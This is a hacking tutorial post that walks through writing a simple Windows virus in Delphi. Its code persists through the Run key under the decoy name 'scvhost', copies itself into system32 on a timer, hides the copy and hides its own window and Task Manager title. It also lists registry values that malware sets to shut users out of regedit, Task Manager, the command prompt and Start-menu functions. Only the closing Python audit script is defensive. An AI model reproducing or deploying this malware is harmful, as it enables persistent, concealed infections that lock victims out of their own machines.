
Registry Manipulation


Why do local viruses mostly go after the registry? Simple: Windows does its job with the help of a component called the registry. The registry can be called the heart of Windows, because it holds a large collection of data that mostly serves to configure Windows itself and the software that has been installed.

[ so the registry is pretty cool, huh ]
Exactly, and once we know what those registry values do, we can become a good person or instead a bad one! But it all depends on your intentions... heh heh heh

We often run into local viruses, and quite a few of them cannot be detected by antivirus. So I'll try to dissect a local virus here.

If we want to catch a thief, we have to think like a thief... but only think like one.

Below are a few virus-writing techniques in Delphi, along with the registry manipulation values that local viruses commonly use... what you do with them depends on your intentions, mind you.

CREATE VIRUS WITH DELPHI
In this discussion we'll try to build a simple virus in Delphi, with one note: please don't run it on your friend's computer, because that sin will fall on you, not on the author.

Delphi can be used to read or change values in the Windows registry. Let's get straight to it:
Add Registry to the uses clause.
uses ..., ..., Registry;
Let's make our application run when the computer first starts (this is just an example, feel free to build on it):

procedure TForm1.FormCreate(Sender: TObject);
var
  Reg: TRegistry;
begin
  Reg := TRegistry.Create;
  try
    Reg.RootKey := HKEY_LOCAL_MACHINE;
    // Open the Run key (create it if missing); everything listed here starts at logon
    Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run', True);
    // Register this executable under the name 'scvhost'
    Reg.WriteString('scvhost', Application.ExeName);
    Reg.CloseKey;
  finally
    Reg.Free;
  end;
end;

Save your project and run it. Once it has run, try restarting, open msconfig and look at the result. Easy, right? For the other values, try them out yourself...

Local viruses usually duplicate themselves when they run, right? Can that be done with Delphi? Absolutely. In Delphi it goes like this:
say we use a Timer component and its Interval property, meaning the file copy is performed every X seconds:

procedure TForm1.Timer1Timer(Sender: TObject);
begin
  // Copy the running executable into system32 under a new name (overwrite if it exists)
  CopyFile(PChar('.\' + ExtractFileName(Application.ExeName)),
           PChar('C:\Windows\system32\mangga3.exe'), False);
  // Mark the file hidden (note that this path differs from the copy destination above)
  FileSetAttr('C:\Windows\mangga3.exe', faHidden);
end;

Just build on it from there... You can also modify the file attribute value! Read Delphi's built-in help to learn which values there are.

Viruses usually can't be seen in Task Manager, right? They don't show up with Shift+Tab either, and usually the virus application isn't visible while it is active. The program is only 2 lines.
Create a new project, then open the project source by pressing Ctrl+F12 and choosing the project. Project1 will appear as shown below:

program Project1;

uses
  Forms,
  Unit1 in 'Unit1.pas' {Form1};

{$R *.res}

begin
  Application.Initialize;
  Application.CreateForm(TForm1, Form1);
  Application.Run;
end.

Then we modify it so it becomes:

program Project1;

uses
  Forms,
  Unit1 in 'Unit1.pas' {Form1};

{$R *.res}

begin
  Application.Initialize;
  Application.Title := '';           // not visible in Task Manager
  Application.CreateForm(TForm1, Form1);
  Application.ShowMainForm := False; // the main form is not shown while the process runs
  Application.Run;
end.

Registry Manipulation
These manipulations are mostly used by virus applications.

Disable Registry Editing Tools
User Key: [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
Name: DisableRegistryTools
Type: REG_DWORD (DWORD Value)
Value: (0 = allow regedit, 1 = disable regedit)

Remove Run from the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoRun
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
Name: IgnoreShiftOveride
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = ignore shift)

Disable Taskbar Context Menus
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoTrayContextMenu
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Hide Start Menu Subfolders
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoStartMenuSubFolders
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enable restriction)

Remove "All Programs" Button from the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoStartMenuMorePrograms
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = disable button)

Disable the Ability to Right Click on the Desktop
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoViewContextMenu
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Disable Task Scheduler
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
Name: SchedulingAgent
Type: REG_SZ (String Value)
Value: mstask.exe

Disable the MS-DOS Command Prompt
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
Name: Disabled
Type: REG_DWORD (DWORD Value)
Value: (0 = disable, 1 = enable)

Disable Command Prompt and Batch Files
User Key: [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
Name: DisableCMD
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = disabled, 2 = disabled but allow batch)

Run Startup Programs in a Command Prompt
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
Name: AutoRun
Type: REG_SZ (String Value)
Value: Command to Execute
ex: AutoRun REG_SZ "c:\batch\environ.bat"
If there is more than one command, use "command1 && command2"

Disable TaskManager
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
Name: DisableTaskMgr
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = disable Task Manager)

Specify Executable Files to be Launched by Winlogon
System Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Name: System
Type: REG_SZ (String Value)
Value: (default = lsass.exe)

Disable Menu Bars and the Start Button
Rename the key by placing a dash "-" in front of the GUID (i.e. {-5b4dae26-b807-11d0-9815-00c04fd91972}).
System Key: [HKEY_CLASSES_ROOT\CLSID\{5b4dae26-b807-11d0-9815-00c04fd91972}]

Hide or Display Administrative Tools Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
Name: StartMenuAdminTools
Type: REG_SZ (String Value)
Value: Yes or No

Remove the Ability to Right Click on the Start Button (All Windows)
The effect of this manipulation shows when the user right-clicks the Start button to choose Explore or Find.

Under the key [HKEY_CLASSES_ROOT\Directory\shell], rename the 'shell' value to 'shell.old'.
Do the same for
the key [HKEY_CLASSES_ROOT\Folder\shell] and rename its value to [...\shell.old].

Hide Control Panel, Printer and Network Settings
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoSetFolders
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Hide the Taskbar Settings on the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoSetTaskbar
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Remove Log Off from the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoLogOff
Type: REG_DWORD (DWORD Value)
Value: (1 = no log off, 0 = show log off)

Disable Drag-and-Drop on the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoChangeStartMenu
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

Remove Search from the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoFind
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Remove Tray Items from Taskbar
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoTrayItemsDisplay
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enable restriction)

Disable Folder Options Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoFolderOptions
Type: REG_DWORD (DWORD Value)
Value: (0 = show options, 1 = hide options)

Remove Properties from My Computer
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoPropertiesMyComputer
Type: REG_DWORD (DWORD Value)
Value: (0 = Properties, 1 = No Properties)

Hide All Items on the Desktop
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoDesktop
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enabled restriction)

Disable the Windows Hotkeys
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoWinKeys
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

Hard Disk Free Space Warning
System Key: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters]
Name: DiskSpaceThreshold
Type: REG_DWORD (DWORD Value)
Value: 0 – 99 percent (Default is 10)
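As the defender's counterpart to the Run-key snippet in the Delphi section and to the restriction values in this list, here is an added Python example (not from the original post) that parses a regedit .reg export and reports autorun entries plus any of the listed lockout policies set to a nonzero value. The sample export, the value names it contains and the path it points at are constructed for the example.

```python
import re

# Lockout values from the list above; a virus sets these to 1 to shut the user out.
LOCKOUT_VALUES = {
    "DisableRegistryTools", "DisableTaskMgr", "DisableCMD", "NoRun", "NoFind",
    "NoFolderOptions", "NoDesktop", "NoViewContextMenu", "NoSetFolders",
    "NoSetTaskbar", "NoLogOff", "NoWinKeys", "NoTrayContextMenu",
}
# Autostart keys named in the article: Run, and RunServices (SchedulingAgent).
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Services)?$", re.IGNORECASE)

def parse_reg_export(text):
    # Parse a "Windows Registry Editor Version 5.00" export into {key: {name: raw}}.
    # Only [key] headers and single-line "name"=value entries are handled.
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith(('"', "@")) and "=" in line:
            name, _, raw = line.partition("=")
            keys[current][name.strip('"')] = raw
    return keys

def decode(raw):
    # dword:xxxxxxxx -> int; "quoted" strings are unescaped; anything else stays raw.
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace("\\\\", "\\").replace('\\"', '"')
    return raw

def audit(reg_text):
    # Return (kind, key, name, value) tuples for autorun entries and active lockouts.
    findings = []
    for key, values in parse_reg_export(reg_text).items():
        is_run = bool(RUN_KEY_RE.search(key))
        is_policy = "\\policies\\" in key.lower()
        for name, raw in values.items():
            value = decode(raw)
            if is_run:
                findings.append(("autorun", key, name, value))
            elif is_policy and name in LOCKOUT_VALUES and value != 0:
                findings.append(("lockout", key, name, value))
    return findings

# Constructed sample export (not from a real machine): the Run entry the Delphi
# snippet creates, one policy left at 0 and two policies set to 1.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"scvhost"="C:\\Windows\\system32\\mangga3.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
"DisableTaskMgr"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"""

if __name__ == "__main__":
    for kind, key, name, value in audit(SAMPLE_REG):
        print(f"{kind:8} {key}\\{name} = {value!r}")
```

On a real system the input would come from `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Policies policies.reg` (and the equivalent HKLM keys), so the check runs offline without touching the live registry.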

Want to know more about registry hacks? Try http://www.mdgx.com/
